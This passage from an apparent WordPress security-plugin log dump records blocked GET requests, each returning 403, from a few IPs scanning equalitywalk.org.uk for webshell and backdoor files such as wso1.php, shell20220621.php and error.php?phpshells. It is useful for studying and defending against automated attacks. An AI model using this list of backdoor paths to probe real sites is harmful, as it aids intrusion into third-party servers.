Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ykG5IxmC6sirPDJuLTweYh7z',0,1673949943.4791,112,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-admin/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','JU5i31Tvf4W6wBjzLKaeGASF',0,1673949943.4981,130,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','dlRuvHUjrpOGCDTZ5Q0Woy46',0,1673949943.5014,140,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/fx.php','','{\"1\":\"python-requests\\/2.28.1\"}','gEwUXs3dGHab7Ryno108zNCi',0,1673949943.5929,137,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','L34xVqdYAZPtC8DBNWMH5TGE',0,1673949943.5904,156,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/wp-atom.php','','{\"1\":\"python-requests\\/2.28.1\"}','agyRAGI9s7YWOl4XkSjcKUzT',0,1673949943.6042,163,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/license.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','LTIBsvfqe7J6VSoklnKcdCb5',0,1673949943.6483,129,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','hTqU83rFw9Vn1NsedDyAXPIo',0,1673949943.6942,182,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/fx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','xLyZYFso8vb1a9qilkHWjCOU',0,1673949943.8837,226,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','N6mYlXezZIrPLMqhi0awtAnE',0,1673949944.0005,313,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/404.php','','{\"1\":\"python-requests\\/2.28.1\"}','JPa69Q3YXfpdrs4wMc5oNU8K',0,1673949947.5538,208,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/k.php','','{\"1\":\"python-requests\\/2.28.1\"}','uVK3LicN6k2hJsf9Upyb5orC',0,1673949947.5542,247,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/a.php','','{\"1\":\"python-requests\\/2.28.1\"}','47XOjZPc3wzuvaxnRmJV2LWS',0,1673949948.1111,472,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','7KfCb8rQSlhx2jZeMEu4RpYI',0,1673949948.4137,207,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','UTxMNkyCzEZA4vuhtHYPdfqO',0,1673949948.3309,324,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','27CiTpsO3UxXyKaefzHNwgh6',0,1673949949.4076,129,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/ws.php','','{\"1\":\"python-requests\\/2.28.1\"}','Xe3QihbAkYxVRv4jK0NOFfGw',0,1673949954.0437,107,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','mwlfLvqWT43VBbYGegpnOHFu',0,1673949954.6491,127,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/3index.php','','{\"1\":\"python-requests\\/2.28.1\"}','E4hdVPMWYH5nmivTC2D3NgyZ',0,1673949955.0686,216,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/xmlrpcs.php','','{\"1\":\"python-requests\\/2.28.1\"}','Z8QiWlpVhRNKn3LP6qeC4Ukf',0,1673949955.0525,241,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','mYtcq0XeIr1PMbKi9fU36nFj',0,1673949955.6422,307,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/xmlrpcs.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','qCBSjV1tw9Ehg84aQZJNOmuM',0,1673949955.7297,494,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"python-requests\\/2.28.1\"}','w3EaW1hIpdlH9LVsMmozYG5B',0,1673949969.9621,160,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/sendmail.php','','{\"1\":\"python-requests\\/2.28.1\"}','EJtd2yN9IZFgouDTQPLfKH4w',0,1673949969.9632,192,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/site/wp-content/themes/seotheme/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','kbNQSOs1MAhmjVuRKzwHFD7t',0,1673949969.9433,236,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/ups.php','','{\"1\":\"python-requests\\/2.28.1\"}','CjU7tEuaGHYiSnqmOLM0Dfe8',0,1673949969.9887,193,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/0z.php','','{\"1\":\"python-requests\\/2.28.1\"}','2hCk0pAKEq47XlxzDPTM9Lbw',0,1673949970.0456,153,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/b.php','','{\"1\":\"python-requests\\/2.28.1\"}','rwT53uhMobaygtVi86dxDAlP',0,1673949970.4670,99,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/ups.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Wk1pDCf9g7L4nIydKzwjhGF2',0,1673949970.9216,95,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/sendmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','BiN4SVe8ZLgy5CmQkUnR7JPq',0,1673949971.0449,139,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/site/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','TBbSv7R2XGUsKhrYz9HiuJ3C',0,1673949971.0449,141,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','7JpFMB2WcoQGgY1HvUCf6njh',0,1673949971.1692,107,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/0z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','5touqjD2IaswpLWxdZFc9G0y',0,1673949971.1935,127,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ASQIf7DUc2qCGRtEXgHNO5BY',0,1673949971.2845,111,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/style.php','','{\"1\":\"python-requests\\/2.28.1\"}','YcfxPNHuTIJKkUlXMpZEz6B0',0,1673949973.6742,107,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','fvCZDWtdNIeo5czhjQ8FGmO7',0,1673949976.5188,144,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/lufix.php','','{\"1\":\"python-requests\\/2.28.1\"}','C61yZ2LFbh8SYPAXJo7rdB0e',0,1673950011.3453,117,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/css/xm.php','','{\"1\":\"python-requests\\/2.28.1\"}','UsSPuo1XzvcgWKG8jVkxTAa7',0,1673950011.4499,119,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/media-admin.php','','{\"1\":\"python-requests\\/2.28.1\"}','Wbyo3zO1pAKYkQeN9xJEjfnP',0,1673950011.8450,135,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/mt/pekok.php','','{\"1\":\"python-requests\\/2.28.1\"}','DL6j4KrTGvsScxwQplNuOqM2',0,1673950011.9659,109,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/vuln.php','','{\"1\":\"python-requests\\/2.28.1\"}','c3WHvBtXLzaMAK1rqsplo64S',0,1673950012.7388,112,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/mt/pekok.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','sWNb7FZYhdMSmqw8z2j6DJG9',0,1673950012.7087,149,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/lufix.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','G2yOmXcZBuVUE9a4ToKq5P1f',0,1673950012.9977,105,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/media-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','i9CFc6vBgNnyrPkS3sM2WfIp',0,1673950013.1373,109,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','eaRBPvAo1wLVjdJCMzXZYgEK',0,1673950013.1712,146,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/css/xm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','w9U5JWZn6PGC1uaoRhHtdDL8',0,1673950013.1937,148,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-admin/css/colors/coffee/fw.php','','{\"1\":\"python-requests\\/2.28.1\"}','zvlJKQZIfAR987E0Yey42Wi6',0,1673950019.2331,108,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-admin/css/colors/coffee/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','sZkmpe5vQlP4JiWDqVNE3o9L',0,1673950020.7114,143,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/images/wp-blog.php','','{\"1\":\"python-requests\\/2.28.1\"}','aJENkfB0XMh2oS86DeWGUVYu',0,1673950061.8314,113,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/images/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','PWY0ZB7AplOHgDFa45Nr1tvd',0,1673950063.5414,96,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/shell20220621.php','','{\"1\":\"python-requests\\/2.28.1\"}','xuo1mKL56aRQgS0tnCjdy9Z3',0,1673950100.2785,105,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/shell20220621.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','z5AQTZrLdRi7EqHcKkwO4SU0',0,1673950101.4850,101,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/1index.php','','{\"1\":\"python-requests\\/2.28.1\"}','usXKIcM17b9ijmZtBlfSTUPN',0,1673950104.4803,144,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-admin/css/index.php','','{\"1\":\"python-requests\\/2.28.1\"}','08XsNS16IwW3lrny9FZVPRuU',0,1673950104.5665,136,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/w.php','','{\"1\":\"python-requests\\/2.28.1\"}','QhtsMm7oT46ZWw1GJkUxgnuO',0,1673950104.6906,111,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/p.php','','{\"1\":\"python-requests\\/2.28.1\"}','DA7HBPUzW2o0CmbX3xKl8tvh',0,1673950104.8694,117,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/css/wp-atom.php','','{\"1\":\"python-requests\\/2.28.1\"}','n4RLlGZY0eItShcMNbarwxFH',0,1673950105.1261,97,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/css/wp.php','','{\"1\":\"python-requests\\/2.28.1\"}','O0BWhDn9E7ku5rXVg46avbxc',0,1673950105.5836,102,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/error.php?phpshells','','{\"1\":\"python-requests\\/2.28.1\"}','74jexUnShJq5tFuGRsXTCOlD',0,1673950105.5829,105,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ZHaoW2QVB1lCGIUmOFug4At7',0,1673950105.9699,106,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/mini.php','','{\"1\":\"python-requests\\/2.28.1\"}','xApfakyS5m49g7TBsLonbKFZ',0,1673950105.9933,91,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','xMtTcjvDzYWpHZlVB18Q5GrE',0,1673950106.0133,99,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/new-index.php','','{\"1\":\"python-requests\\/2.28.1\"}','yKdHokPtCVpm4eul5ShX0s3j',0,1673950106.0838,88,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/indeeex.php','','{\"1\":\"python-requests\\/2.28.1\"}','l76WRuepcxybdY28j9MDfrn5',0,1673950106.1121,104,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/doc.php','','{\"1\":\"python-requests\\/2.28.1\"}','rPMgzjG2Y1D9xST64v0hOsEy',0,1673950106.1935,96,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','p2GSWyrbvqxI1iVAFjYm6d7Q',0,1673950106.2586,102,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','2R1gl8GydfhYketzpLHSKrJo',0,1673950106.4531,92,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/css/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','fehLZbzdnTk9gKxYCR1XE4AQ',0,1673950106.4639,96,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/new-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','xi0hp4MDbueFANUIR89tsTGJ',0,1673950106.5831,96,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp_wrong_datlib.php','','{\"1\":\"python-requests\\/2.28.1\"}','OunlmFh8DS9i0K4MdURkB2YJ',0,1673950106.6534,102,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/indeeex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','tAHwEuNBC2n1UhRgjVGcWqQf',0,1673950106.7579,140,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/error.php?phpshells','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','kdKuOwZAYRlEF95QVXCsPJ4v',0,1673950106.7579,146,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/css/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','p5PdUMfEBtbGCSImq6joKhF3',0,1673950106.7586,146,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','iJeTIKwVnOMhlP9E5AQbkSfs',0,1673950107.2811,106,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/doc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','lFy0UeoQg9P5MZCsTfjwN7uY',0,1673950107.3425,110,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-admin/css/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','5u6gjDYxbBqmWA31IsEFP2hz',0,1673950107.6073,111,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/images/vuln.php','','{\"1\":\"python-requests\\/2.28.1\"}','4yXvxVqz0O9IdAji8SnaoKlY',0,1673950171.1815,125,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wordpress/wp-content/themes/seotheme/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','0SMoXK6wiBWysfOpqZ5xURrV',0,1673950171.2734,132,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/m.php','','{\"1\":\"python-requests\\/2.28.1\"}','tQXNugWbz29lBcvx60nmHRsG',0,1673950171.4954,111,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/wp-class.php','','{\"1\":\"python-requests\\/2.28.1\"}','CfeISiPkd8J4WBVH7FQZ9hAN',0,1673950171.5361,106,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/new.php','','{\"1\":\"python-requests\\/2.28.1\"}','FfLJ1jZe4IwW6nRgPxOVoybH',0,1673950171.6083,128,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/customize/class-wp-customize-nav-menu.php?new','','{\"1\":\"python-requests\\/2.28.1\"}','UpszJlMZWdybirP0eQALD8fo',0,1673950171.6823,148,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wordpress/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','cUFqHGTIwSaNlXROBj6exsW7',0,1673950171.7978,152,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/e.php','','{\"1\":\"python-requests\\/2.28.1\"}','bp6tFmAhxJL5BY3uDgrGiNyU',0,1673950171.8498,158,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-admin.php','','{\"1\":\"python-requests\\/2.28.1\"}','jZLYTWyzqbhHfEsJi1trFA2I',0,1673950171.8664,162,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','7iRelUzKGqIbJAfFxXS6ELDm',0,1673950171.9109,174,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/images/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','vckQm3ushGRSZJzWwxgX4CAP',0,1673950172.0559,139,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/customize/class-wp-customize-nav-menu.php?new','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','3RsIrXV0pSUjH9vwidMLQAGa',0,1673950172.4126,119,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Do3e1cCGQ7KiY5S0ZBWqObna',0,1673950173.0986,94,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','1g0Y6S3GzIKTkn7Uf5Ze2hNQ',0,1673950173.5385,100,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','VST3pPhY7kcCnbM1uAwUEmtq',0,1673950173.6263,90,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Hytx9VFBUD7RqTNf0v8Qjs6X',0,1673950173.8980,95,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/hello.php','','{\"1\":\"python-requests\\/2.28.1\"}','ztNwoVAHa71TMfIECOjipW4x',0,1673950174.0081,108,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','USQNpvCAo0XMIugbOdqwlfGD',0,1673950176.2518,115,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/fw.php','','{\"1\":\"python-requests\\/2.28.1\"}','myLdpwu1VqArfl8SeXHJ9ItG',0,1673950206.1021,108,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://equalitywalk.org.uk/wp-includes/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','TguSFWiXloRtaQzLYsNdHcpy',0,1673950207.0632,103,'','GET',403,0,700,0,1,'',0),('192.185.4.72',3233350728,'','https://equalitywalk.org.uk/wp-info.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-info.php\"}','RHnqxS1ThmYr9A2D7u0z36di',0,1673951799.8048,113,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/shell4.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 